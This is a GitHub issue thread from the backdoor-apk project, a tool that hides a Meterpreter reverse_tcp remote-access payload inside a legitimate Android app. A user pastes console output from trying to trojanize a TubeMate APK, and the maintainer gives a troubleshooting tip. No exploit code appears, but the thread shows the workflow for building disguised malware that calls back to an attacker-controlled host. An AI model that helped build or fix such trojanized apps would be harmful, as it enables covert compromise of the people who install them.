### ISSUE TITLE
[!] Failed to decompile original APK file

### ISSUE THREAD

**Issue by devrajashwin** [dana-at-cp/backdoor-apk#28]
./backdoor-apk.sh /root/Downloads/backdoor-apk-master/backdoor-apk/tubemate_2.2.9.apk 
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: ''i used my ip''
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[!] Failed to decompile original APK file

**Comment by dana-at-cp** [comment]
Copy the APK file into the same directory as the backdoor-apk.sh script.

**Comment by devrajashwin** [comment]
see i have al ready  did that ..........
and then i runed 
./backdoor-apk.sh  tubemate_2.2.9.apk

HERE IS THE SCREEN SHOT
![screenshot from 2016-08-19 00-51-42](https://cloud.githubusercontent.com/assets/20875171/17787538/127c0f64-6579-11e6-993d-c01371539710.png)
